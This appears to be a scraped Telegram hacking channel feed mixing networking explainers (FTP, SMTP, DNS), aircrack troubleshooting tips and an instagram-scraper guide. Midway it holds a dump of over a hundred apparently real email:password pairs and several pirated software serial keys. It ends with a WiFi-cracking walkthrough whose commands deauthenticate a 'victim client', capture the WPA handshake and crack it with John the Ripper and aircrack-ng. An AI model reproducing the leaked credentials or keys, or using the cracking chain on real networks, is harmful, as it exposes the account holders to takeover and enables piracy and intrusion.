UNDERCODE COMMUNITY
2.68K subscribers
1.23K photos
31 videos
2.65K files
80.3K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ Google Hacking 2020 :
fb.com/undercodeTesting

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

1) clone or download : https://github.com/octalmage/googlehacks

> download https://web.archive.org/web/20100928034139/http://code.google.com:80/p/googlehacks/downloads/detail?name=GoogleHacksSetup1.6.exe&can=1&q=

2) Google Hacks is a compilation of carefully crafted Google searches that expose novel functionality from Google's search and map services. For example, you can use it to view a timeline of your search results, view a map, search for music, search for books, and perform many other specific kinds of searches.

> This is a rewrite of the very popular cross platform desktop app. Google Hacks has had millions of downloads, been featured on many websites, it's time for an update.

3) run setup, enjoy

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
godsword95@gmail.com:Runescape1
mitchellfrazier16@yahoo.com:Bigmonster7
aboodilatif@gmail.com:aboodi2442
sandyroy9911@gmail.com:violin43
joelsilver@live.com.au:Thomas01
blakeevanhowell@gmail.com:Evan1234
dezzylanham@gmail.com:acft1tm1vb
tobeajufo@icloud.com:Tobe123a
jordanwinslow21@gmail.com:Buzzkill1
granthamlong98@gmail.com:321321gl
colekowalczyk@hotmail.com:Cole123456
sareson91@gmail.com:lauren8769
qhertm@gmail.com:Pokemon111
kernowlokal@yahoo.co.uk:rossi2002
kiki67250@hotmail.fr:69Lyon67
bythebrook42@gmail.com:Maxxer42
kc821guam@gmail.com:2ioijlui
marcustinaza@gmail.com:blahblahblah
tsmckenzie2000@yahoo.com:Pathfinder01
mortisogame@gmail.com:Firefly91
simonmli99@gmail.com:simonli1
sammyblaze@gmail.com:thehotboy1
jruthven@outlook.com:toyota07
mark@rychel.com:jackie10
pjring87@gmail.com:Ducati02
pacobata1973@gmail.com:bata2024
amittpatel@hotmail.com:A156k1s1
slaphappyike@gmail.com:sneaker0201
millerbreadbox@gmail.com:baseball12
livesey.gill@talktalk.net:vanston1402
s.madorski@gmail.com:photo21253
plantalex21@gmail.com:hanner2105
karolvzarinana@hotmail.com:Zarinana123
brian.juan204@yahoo.com:oizanauj95
johngeorgiou1989@hotmail.com:crazyone1
drasia10@yahoo.com:dthvPA123
richard.comicart@gmail.com:donotmove
karlil13@gmail.com:ka131182
Habermancole3@gmail.com:Colesdog1
arsenis.christos@gmail.com:bbf59Fyaz053
snewberry1982@gmail.com:Superman24
hbinmohammed66@gmail.com:hamad5566
irpalmerjr@yahoo.com:matrix22
deson94@gmail.com:boyscout94
th.flavien@hotmail.fr:Bonjourle44
catslack@gmail.com:minesweeper
danes2531@gmail.com:Redwings4
madianne22@outlook.com:Roxybuster09
crarnewc@126.com:wc183007526
mathieu.lebougre@gmail.com:aveyron12
lacknerniklas@hotmail.com:karlmarx1
desman120@gmail.com:danderson123
jrizzly@gmail.com:Rocky1234
wesowens1@gmail.com:Bigblue12
rgrlowe@gmail.com:wireless175
m33msn@aol.com:sean1493
begon123@gmail.com:s0075267
peterat61@gmail.com:bcu5obzx
joehelm@hotmail.co.uk:ploppy11
hari.varma93@gmail.com:Google123
samuelb15@outlook.com:Dodger69
lggeorge@outlook.com:jerome812
oscar2118ortiz@gmail.com:2118hell
catslack@gmail.com:minesweeper
brendonwest@live.co.uk:Rexman007
kajcampbell@sbcglobal.net:kajl1040
viet88tp@gmail.com:Rip2surf
popptaylor23@gmail.com:Oreo2301
gabrielle.thibodeau14@gmail.com:darkl0rd14
aj15444@yahoo.com:ambitious108
nikolas.karatzas@gmail.com:Kasteel24
faganthelee@gmail.com:Strawhat1
eemeli.tampio@gmail.com:8d8swybas
ninjaking574@gmail.com:123kye321
garrett.taggart@yahoo.com:taggart24
ciprianiorga@hotmail.com:cior3652
anastasiasheldon1999@gmail.com:17060007
brazzale@gmail.com:m8q7rwbr
chicagojersey@gmail.com:Q1w2e3R4
tqco@netzero.net:richest3
njdevils99@outlook.com:bagels01
jostorey@live.com:elizabeth
deniseusuka@hotmail.com:cdjuly13
2342w3e4r@gmail.com:1231q2w3e
killerburrito.aj@gmail.com:Awesome01
gs1983@live.com.au:1eighty2
almurar@gmail.com:gzxix1a5
marc-antoine_michaud@outlook.com:crosby87
steven.a.hiller@gmail.com:demonking6
supra_gal@hotmail.com:Sc00bydoo
stegemann@gmail.com:calif0rnia
justin18y@gmail.com:Erindale30
trevor.edwards.04@gmail.com:chester1
zach.kilpack@gmail.com:leapyear44
ven6212@gmail.com:23395589
jacobash91@gmail.com:Shimano65
craig@craigmaguire.net:Stygian01
veronicatracy@me.com:peekaboo23
to.fawaz@gmail.com:vwPassat86
nporikos@gmail.com:hockey21
blackopswmd@gmail.com:Goodbye27
Gladiogaming@gmail.com:Mikemike007
sruthi2801@gmail.com:2801ammu
danielblier@gmail.com:Dblier454
sk_randhawa@hotmail.com:Austin316
elias.fazal@gmail.com:Portland02
ritsblack@hotmail.com:Aa010010
matthieu.dejoue@gmail.com:moutt2k7
serebiisean@gmail.com:Megotgrammar1
fulhamhamster09@googlemail.com:hamster123
benji512512@gmail.com:Brady5126
begon123@gmail.com:s0075267
remy_svardal@hotmail.com:xhevdet222
manicoletta94@gmail.com:Beaser94
pandaboy626@gmail.com:frost626
macha.pavlova@gmail.com:Nikita2004
joenorrie@hotmail.co.uk:Keanu123
mariaL_casino@yahoo.com:loraine12
bigwilsy@gmail.com:imflying123
aes1972@mac.com:Cartman72
peturbjarnason@gmail.com:a1a1a1a2
ashkon28@Hotmail.com:Stpauls12
marinushove@hotmail.com:Kasperkat20
sader8818@gmail.com:marvin8818
slogan6152@gmail.com:Bbranch1
πŸ¦‘only for undercode E N J O Y
πŸ¦‘fifia 08 serial X8MM-RWM9-FIFA-KFLT-FIFA
Adobe Photoshop CS2 v9.0
S/N: 1045-0436-9551-0266-5984-9386
Age Of Empires III: The Warchiefs
RLD12-XTBWA-RLD13-MDFKA-RCTJP
RLD4E-VERAN-DALWA-YS3XA-TPCCR
Command And Conquer 3: Tiberium Wars - Kane Edition
HKM5-YD73-72H6-B273-6FLT
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ File Transfer Protocol FTP :
t.me/UnderCodeTesting

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :


1) In a typical FTP application, users interact with FTP through an FTP proxy. The user first provides the host name of the remote host, so that the FTP user agent establishes a TCP connection to the remote host. After that, the user is required to provide a user name and password, which are transmitted over the TCP connection as part of the FTP command; once the server is authorized, the user can communicate with The server is transferring files.

2) Both HTTP and FTP are application layer protocols. They both run on top of the TCP protocol, but there are some important differences between them. One is that FTP uses a parallel TCP connection to transfer data. One TCP is called a control connection .

3) Used to transfer FTP commands. A TCP connection is called a data connection , which is used to transfer file data. Because the control information in the FTP protocol is transmitted through an independent TCP connection, we call FTP control information transmitted out of band ; as if the control and data information transmitted through the same TCP is called inband. TCP control connection port 21, data connection port 20

4) It should be noted that the control connection in FTP runs through the entire session, but the data connection is established when a file starts to be transferred and closed after the transfer is completed; therefore, each time a new file is transferred, a new data connection is created;

5) At the same time, FTP needs to retain the user's state during the entire session , that is, to associate the control connection with the user account, while recording the user's operations on the remote directory tree, which limits the total number of sessions that FTP can simultaneously maintain.

6) FTP commands and answers
The commands from the client to the server and the responses from the server to the client are passed on the control connection in 7-bit ASCII format.

πŸ¦‘ The common commands are as follows:

RETR <filename> Retrieve (copy) files from the server
STOR <filename> Store (copy) files to the server
USER <username >> User name for system login
PASS <password> System login password
The common answers are as follows:



125 Open data connection and start transmission


331 Require password
452 Insufficient disk space, write error
425 Unable to open data connection
Written by UnderCode
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ Email on the Internet-understand before attack
pinterest.com/undercode_Testing

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

1) Internet e-mail system has three core components: user agent , mail server , and SMTP (Simple Mail Transfer Protocol).

2) The mail server forms the core of the email system. Each sender and receiver has a mailbox on the mail server; a typical e-mail has been sent: the sender sends the mail to the sender's mail server through the user agent, and then to the receiver's mail server, and then the mail is distributed To the recipient's mailbox; the recipient needs to go through the mail server to get their own mail from the mail server

3) Is the main application layer protocol SMTP Internet email, it uses the TCP can send mail to the mail server of the recipient from the sender's mail server by data transmission; running SMTP server and SMTP clients simultaneously on each mail server. When the mail server receives mail from other mail servers, it behaves as an SMTP server, and when the mail server sends mail to other mail servers, it behaves as an SMTP client.

4) If the sender cannot send the mail to the server of the receiver, the mail server of the sender will keep the message in a message queue and try to send it again later.

Written by UnderCode
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ Services provided by DNS :
twitter.com/undercodenews

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

1) it should be noted that in a computer network, we use IP addresses to mark the only host in the network at a certain time. The IP address (IPV4) is composed of 4 bytes and has a strict hierarchical result. Each byte is separated by a dot. At the same time, in order to facilitate the memory, we also mark the hosts by providing them with a host name that is easy to remember, so that the communication between the hosts becomes convenient.

2) However, it also introduces a problem: the conversion of host name and IP address ; because at the sender side of the message, the host name is usually used to identify the host, but in the computer network, the IP address is used to mark the host.

3) There is an application in the computer network that specializes in providing such services. It is the Domain Name System (DNS) . DNS is a distributed database consisting of a hierarchical DNS server and an application layer protocol that enables hosts to query the distributed database;

4) The user host should be running a DNS client. DNS is usually used by other application layer protocols, such as HTTP, SMTP, and FTP. Before these protocols officially work, first use the services provided by DNS to convert host names into IP addresses. It can be found that while DNS brings convenience to users, it also brings extra delay to network applications-query DNS Server latency. It should be noted that caching, as a means to improve performance, especially query performance, is also applicable in DNS.

5) DNS runs on UDP and uses port 53

In addition to providing host name to IP address translation , DNS also provides the following important services:


6) Host alias : Although the host name is much easier to remember than the IP address, sometimes our host name is still very long and difficult to remember, so we need to rename the host name. This is the host alias. DNS not only provides Host name to IP address conversion services also provide conversion of host names and host aliases; at this time, host names are called canonical host names;

7) mail server aliases : DNS also provides mail server host name and alias conversion services. In fact, A company's mail server and web server can use the same host alias; MX records allow a company's mail server and web server to use the same host name.

8) Load distribution : DNS is also used to distribute load among redundant servers. Each server has a different IP address, but they are all associated with the same host name, that is, an IP address set is associated with a canonical host name; when a DNS server receives a DNS request, the server awards the use of IP The entire set of addresses is treated as a response, but the order of these addresses is cycled in each response. Because clients usually use the first element of the IP address set, DNS distributes the load among redundant Web servers. Similarly, multiple mail servers can have the same alias.

Written by UnderCode
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ Aireplay-ng General Troubleshooting Tips
t.me/undercodeTesting

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

1) Most modes of Aireplay-ng, with the exception of client disassociation, fake
authentication, and injection test, require that your MAC address is associated with
the AP. You must either perform a fake authentication to associate your MAC
address with the AP or use the MAC address of a client that is already associated
with the AP. Failure to do this will cause the access point to reject your packets.

2) Look for deauthentication or disassociation messages during injection that indicate
you are not associated with the AP. Aireplay-ng will typically indicate this or it can
be seen in tcpdump: β€˜tcpdump -n -e -s0 -vvv -i <interface name>’

3) Ensure the wireless card driver is properly patched and installed. Use the injection
test to confirm that your card can inject.

4) Make sure that you are physically close enough to the AP. You can confirm that you
can communicate with the specific AP by running the injection test.

5) Verify that your card is in monitor mode. Use β€˜iwconfig’ to confirm this.

6) Your card needs to be configured on the same channel as the AP.

7) Make sure you are using a real MAC address.

8) Some APs are programmed to only accept connections from specific MAC addresses.
In this situation, you will need to obtain a valid MAC address by observing
Airodump and use a valid client MAC address once it becomes inactive. Do not
perform a fake authentication for a specific client MAC address if the client is still
active on the AP.

@UnderCodeOfficial
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
πŸ¦‘ this commun error when hack wifi on kali or parrot
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Waiting for Beacon Frame -due to wifi hacking recently tutorials :by undercode
t.me/undercodeTesting

If, while executing the attack, the system freezes or a line is printed with β€œWaiting for
beacon frame” with no other activity, it could be due to one of the following:

1) The wireless card is set to a channel different than that of the AP. Ensure that you
start monitor mode on the same channel as the AP.

2) The card is hopping channels. This can be resolved by running Airodump-ng with
the -c parameter and specifying the AP channel.

3) The ESSID is wrong. If it contains spaces or special characters, enclose it in quotes.

4) The BSSID is wrong. Ensure you have entered the BSSID correctly.

5) You are too far away from the AP and are not receiving any beacons. Use tcpdump,
Wireshark, or Airodump-ng to see if you are receiving beacons. If not, move closer to
the AP.

6) If none of the above applies, it could be due to faulty drivers.

@undercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ RECOMMENDED TO KNOW, FOR WIFI ATTACK :
fb.com/undercodeTesting

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

1) ieee80211 vs. mac80211

Under Linux operating systems, there are 2 different wireless stacks: the older ieee80211
and the newer mac80211. We’ll review both of these stacks as they are both still in use.

2) ieee80211

The ieee80211 stack has been around since the Linux 2.4 and even 2.2 kernels. In order to
control the wireless cards, some early drivers required an external utility and because
there were many different chipsets, there were multiple utilities to control them since they
had different capabilities.
To cope with this fragmentation, an API was created in order to provide a common set of
utilities to control the different drivers, the Wireless Extension (WE)11. The WE has the

πŸ¦‘ following utilities:

1) iwconfig: manipulates the basic wireless parameters – change modes, set channels,
and keys

2) iwlist: allows for the initiation of scanning, listing frequencies, bit rates, and
encryption keys

3) iwspy: provides per-node link quality (not often implemented by drivers)

4) iwpriv: allows for the manipulation of the Wireless Extensions specific to a driver

@undercodeOfficial
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘instagram-scraper is a command-line application written in Python that scrapes and downloads an instagram user's photos and videos. Use responsibly:
t.me/undercodeTesting

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

> https://github.com/rarcega/instagram-scraper

To install instagram-scraper:

1) $ pip install instagram-scraper

2) To update instagram-scraper:

$ pip install instagram-scraper --upgrade

3) Alternatively, you can clone the project and run the following command to install: Make sure you cd into the instagram-scraper-master folder before performing the command below.

> $ python setup.py install

πŸ¦‘To scrape a user's media:

$ instagram-scraper <username> -u <your username> -p <your password>

To scrape a hashtag for media:

$ instagram-scraper <hashtag without #> --tag
It may be useful to specify the --maximum <#> argument to limit the total number of items to scrape when scraping by hashtag.

To specify multiple users, pass a delimited list of users:

$ instagram-scraper username1,username2,username3
You can also supply a file containing a list of usernames:

$ instagram-scraper -f ig_users.txt
# ig_users.txt

username1
username2
username3

# and so on...
The usernames may be separated by newlines, commas, semicolons, or whitespace.

πŸ¦‘--help -h Show help message and exit.

--login-user -u Instagram login user.

--login-pass -p Instagram login password.

--followings-input Use profiles followed by login-user as input

--followings-output Output profiles from --followings-input to file

--filename -f Path to a file containing a list of users to scrape.

--destination -d Specify the download destination. By default, media will
be downloaded to <current working directory>/<username>.

--retain-username -n Creates a username subdirectory when the destination flag is
set.

--media-types -t Specify media types to scrape. Enter as space separated values.
Valid values are image, video, story (story-image & story-video),
or none. Stories require a --login-user and --login-pass to be defined.

--latest Scrape only new media since the last scrape. Uses the last modified
time of the latest media item in the destination directory to compare.

--latest-stamps Specify a file to save the timestamps of latest media scraped by user.
This works similarly to --latest except the file specified by
--latest-stamps will store the last modified time instead of using
timestamps of media items in the destination directory.
This allows the destination directories to be emptied whilst
still maintaining history.

--cookiejar File in which to store cookies so that they can be reused between runs.

--quiet -q Be quiet while scraping.

--maximum -m Maximum number of items to scrape.

--media-metadata Saves the media metadata associated with the user's posts to
<destination>/<username>.json. Can be combined with --media-types none
to only fetch the metadata without downloading the media.

--include-location Includes location metadata when saving media metadata.
Implicitly includes --media-metadata.

--profile-metadata Saves the user profile metadata to <destination>/<username>.json.

--proxies Enable use of proxies, add a valid JSON with http or/and https urls.
Example: '{"http": "http://<ip>:<port>", "http": "https://<ip>:<port>" }'

--comments Saves the comment metadata associated with the posts to


...
@undercodeOfficial
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Wifi Cracking tutorial after capture handshake :
pinterest.com/undercode_Testing

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

If you haven’t already done so, ensure your AP is configured with WPA/WPA2 encryption.

1) Select a password that requires extra digits to be added to it as was demonstrated in this
module.

2) Capture a WPA handshake by deauthenticating your victim client.

3) Edit the default John the Ripper rules so that your new password can be found.

3) Crack the WPA password using John the Ripper combined with Aircrack-ng.

πŸ¦‘ SO HOW TO DO :

Aircrack-ng and JTR Attack Summary

Place your wireless card into monitor mode on the channel number of the AP:

> Start an Airodump capture, filtering on the AP channel and BSSID, saving the capture to
disk:

> Force a client to reconnect and complete the 4-way handshake by running a
deauthentication attack against it:

> Once a handshake has been captured, change to the John the Ripper directory and pipe in
the mangled words into Aircrack-ng to obtain the WPA password:


> airmon-ng start <interface><AP channel>

> airodump-ng -c <AP channel> --bssid <AP MAC> -w <capture><interface>

> aireplay-ng -0 1 -a <AP MAC> -c <Client MAC><interface>
./john --wordlist=<wordlist> --rules --stdout | aircrack-ng -e <ESSID> -w -
<capture>

ENJOY
@UndercodeOfficial
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁